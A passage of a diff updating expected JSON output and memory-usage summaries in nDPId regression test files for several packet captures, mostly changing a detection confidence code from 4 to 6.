+00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2010,"source":"rdp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2010,"flow_first_seen":1559207465138,"flow_last_seen":1559207472692,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1273,"flow_tot_l4_payload_len":534243,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1559207472692,"l3_proto":"ip4","src_ip":"172.16.2.185","dst_ip":"192.168.2.142","src_port":52494,"dst_port":3389,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"30": {"risk":"Desktop\/File Sharing","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"6":"DPI"},"proto":"RDP","breed":"Acceptable","category":"RemoteAccess"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2010,"source":"rdp.pcap","alias":"nDPId-test","packets-captured":2010,"packets-processed":2010,"total-skipped-flows":0,"total-l4-payload-len":534243,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1559207472692} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2010/2010 
@@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5927743 bytes -~~ total memory freed........: 5927743 bytes -~~ total allocations/frees...: 120125/120125 +~~ total memory allocated....: 6061377 bytes +~~ total memory freed........: 6061377 bytes +~~ total allocations/frees...: 122887/122887 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 436 chars ~~ json string max len.......: 820 chars diff --git a/test/results/reasm_crash_anon.pcapng.out b/test/results/reasm_crash_anon.pcapng.out index 31993d5a2..9e5661387 100644 --- a/test/results/reasm_crash_anon.pcapng.out +++ b/test/results/reasm_crash_anon.pcapng.out @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5882213 bytes -~~ total memory freed........: 5882213 bytes -~~ total allocations/frees...: 118326/118326 +~~ total memory allocated....: 6011186 bytes +~~ total memory freed........: 6011186 bytes +~~ total allocations/frees...: 121086/121086 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 474 chars ~~ json string max len.......: 657 chars diff --git a/test/results/reasm_segv_anon.pcapng.out b/test/results/reasm_segv_anon.pcapng.out index 1af7cab6a..04f2f8523 100644 --- a/test/results/reasm_segv_anon.pcapng.out +++ b/test/results/reasm_segv_anon.pcapng.out 
@@ -4,7 +4,7 @@ 00413{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AAAAcxs8EFFy5LtdCABFeABcpb4AAEARUG2RTALsu2A0VQhoCGgASAAAMv8AOAn8kEPKcwAARQAANFkiQAB\/BgGSrBEkFT++kSvhEwBQ8LOPBjqqVCGAEAEBeCMAAAEBBQo6qnTxOqqFWQ=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1550422828553,"flow_last_seen":1550422828553,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1550422828553,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1550422828553,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1550422828553,"pkt":"AAAAcxs8EFFy5LtdCABFeABcpb4AAEARUG2RTALsu2A0VQhoCGgASAAAMv8AOAn8kEPKcwAARQAANFkiQAB\/BgGSrBEkFT++kSvhEwBQ8LOPBjqqVCGAEAEBeCMAAAEBBQo6qnTxOqqFWQ=="} 
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1550422828553,"flow_last_seen":1550422828553,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1550422828553,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1550422828553,"flow_last_seen":1550422828553,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1550422828553,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} 00240{"error_event_id":15,"error_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":2,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1550422828949} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1550422828553,"pkt":"AAAAcxs8EFFy5LtdCABFeABcLoEAAEARx6qRTALsu2A0VQhoCGgASAAAMv8AOAn8kEPNcwAARQAANFkkQAB\/BgGQrBEkFT++kSvhEwBQ8LOPBjqqVCGAEAEBcqsAAAEBBQo6qnTxOqqK0Q=="} 
00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1550422828949,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1550422828949,"pkt":"AAAAcxs8EFFy5LtdCABFeABcLoEAAEARx6qRTALsu2A0VQhoCGgASAAAMv8AOAn8kEPNcwAARQAANFkkQAB\/BgGQrBEkFT++kSvhEwBQ8LOPBjqqVCGAEAEBcqsAAAEBBQo6qnTxOqqK0Q=="} 
@@ -61,7 +61,7 @@ 00446{"packet_event_id":1,"packet_event_name":"packet","packet_id":79,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":122,"pkt_l4_len":0,"thread_ts_msec":1550422842802,"pkt":"AAAAcxs8EFFy5LtdCABFeABsdGMAAEARgbiRTALsu2A0VQhoCGgAWAAAMv8ASAn8kEMzdAAARQAARFmCQAB\/BgEirBEkFT++kSvhEwBQ8LOPBjqqtinAEAEB1kkAAAEBBRo6qudhOqryUTqqwRk6qswJOqrRgTqq1vk="} 00241{"error_event_id":15,"error_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":81,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":122,"expected":126,"global_ts_msec":1550422844222} 00446{"packet_event_id":1,"packet_event_name":"packet","packet_id":81,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":122,"pkt_l4_len":0,"thread_ts_msec":1550422842865,"pkt":"AAAAcxs8EFFy5LtdCABFeABsUeoAAEARpDGRTALsu2A0VQhoCGgAWAAAMv8ASAn8kEM8dAAARQAARFmLQAB\/BgEZrBEkFT++kSvhEwBQ8LOPBjqqu6HAEAEB0NEAAAEBBRo6qudhOqryUTqqwRk6qswJOqrRgTqq1vk="} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":82,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":82,"flow_first_seen":1550422828553,"flow_last_seen":1550422844224,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74496,"flow_avg_l4_payload_len":908,"midstream":0,"thread_ts_msec":1550422844224,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":82,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":82,"flow_first_seen":1550422828553,"flow_last_seen":1550422844224,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74496,"flow_avg_l4_payload_len":908,"midstream":0,"thread_ts_msec":1550422844224,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":82,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","packets-captured":82,"packets-processed":82,"total-skipped-flows":0,"total-l4-payload-len":74496,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":65,"global_ts_msec":1550422844224} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 82/82 @@ -71,9 +71,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871821 bytes -~~ total memory freed........: 5871821 bytes -~~ total allocations/frees...: 118196/118196 +~~ total memory allocated....: 6005455 bytes +~~ total memory freed........: 6005455 bytes +~~ total allocations/frees...: 120958/120958 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 244 chars ~~ json string max len.......: 703 chars 
diff --git a/test/results/reddit.pcap.out b/test/results/reddit.pcap.out
index 39080e9d5..1f97762cb 100644
--- a/test/results/reddit.pcap.out
+++ b/test/results/reddit.pcap.out
@@ -8,24 +8,24 @@ 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605291684452,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684452,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iiLjUAAAAAoAL9IMZSAAACBAWgBAIICql037gAAAAAAQMDBw=="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1605291684476,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684476,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbucXOWkwh+EoHfGoBJXgJjYAAACBAV4AQMDAwQCCArC1zJs1N1gBw=="} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1605291684476,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684476,"pkt":"qtsDr8lk5EKm5WPyht1gBBqZACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnFwBu4Sgd8blpMIggBAB+xzRAAABAQgK1N1gIMLXMmw="} 
-00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684476,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684476,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684481,"flow_last_seen":1605291684481,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684481,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605291684481,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684481,"pkt":"qtsDr8lk5EKm5WPyht1gB3LfACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PABuxF7CxQAAAAAoAL9IHB8AAACBAWgBAIICql039UAAAAAAQMDBw=="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605291684485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684485,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbucXoJUF9DimtmGoBJXgOayAAACBAV4AQMDAwQCCArC1zJ11N1gBw=="} 
00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605291684485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684485,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc7vvL1mKYoi42oBJXgKSSAAACBAV4AQMDAwQCCArC1zJ1qXTfuA=="} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1605291684485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684485,"pkt":"qtsDr8lk5EKm5WPyht1gDERGACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnF4Bu+Ka2YaCVBfRgBAB+2qiAAABAQgK1N1gKcLXMnU="} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1605291684485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684485,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iiLjb7y9ZjgBAB+yiDAAABAQgKqXTf2cLXMnU="} 
-00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684485,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684452,"flow_last_seen":1605291684486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684486,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684485,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684452,"flow_last_seen":1605291684486,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684486,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684551,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc8HTo0uYRewsVoBJXgNkGAAACBAV4AQMDAwQCCArC1zKKqXTf1Q=="} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684551,"pkt":"qtsDr8lk5EKm5WPyht1gB3LfACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PABuxF7CxV06NLngBAB+1zSAAABAQgKqXTgG8LXMoo="} 
-01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 